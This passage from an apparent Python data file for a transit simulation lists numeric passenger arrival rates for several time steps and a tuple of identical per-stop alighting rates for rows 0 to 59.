(1.636589136448773, 1.1427207650708489, 1.503087727591788, 1.5233062030748648, 1.3674720398758062, 0.6828824031784915, 0.5118243828380126, 0.5251649304390055, 0.7580531703483426, 0.2676626743348225, 0.21139168794120244, 0.12716206762859264, 0.0, 1.82329674229085, 1.3987827439145188, 1.056958439706012, 0.8029880230044673, 1.5161063406966853, 0.7352309026146077, 0.5118243828380126, 0.48777314512749387, 0.6837360199379031, 0.5077687343582884, 0.3006175455183576, 0.10388370591553173, 0.0), # 177
(1.5431782297241188, 1.0765921361465705, 1.4186582539969381, 1.437203080401335, 1.290547673133897, 0.6447640515391326, 0.4824369098831035, 0.4958981673815776, 0.715907068075878, 0.25243537537672506, 0.19938748124920752, 0.1199654804293876, 0.0, 1.7206584679313008, 1.3196202847232632, 0.9969374062460375, 0.757306126130175, 1.431814136151756, 0.6942574343342086, 0.4824369098831035, 0.46054575109938045, 0.6452738365669485, 0.47906769346711175, 0.2837316507993876, 0.09787201237696096, 0.0), # 178
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 179
)
passenger_allighting_rate = (
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 0
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 1
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 2
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 3
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 4
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 5
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 6
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 7
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 8
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 9
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 10
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 11
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 12
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 13
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 14
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 15
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 16
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 17
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 18
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 19
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 20
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 21
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 22
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 23
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 24
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 25
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 26
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 27
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 28
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 29
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 30
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 31
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 32
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 33
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 34
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 35
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 36
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 37
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 38
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 39
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 40
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 41
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 42
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 43
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 44
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 45
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 46
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 47
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 48
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 49
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 50
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 51
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 52
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 53
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 54
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 55
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 56
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 57
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 58
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 59
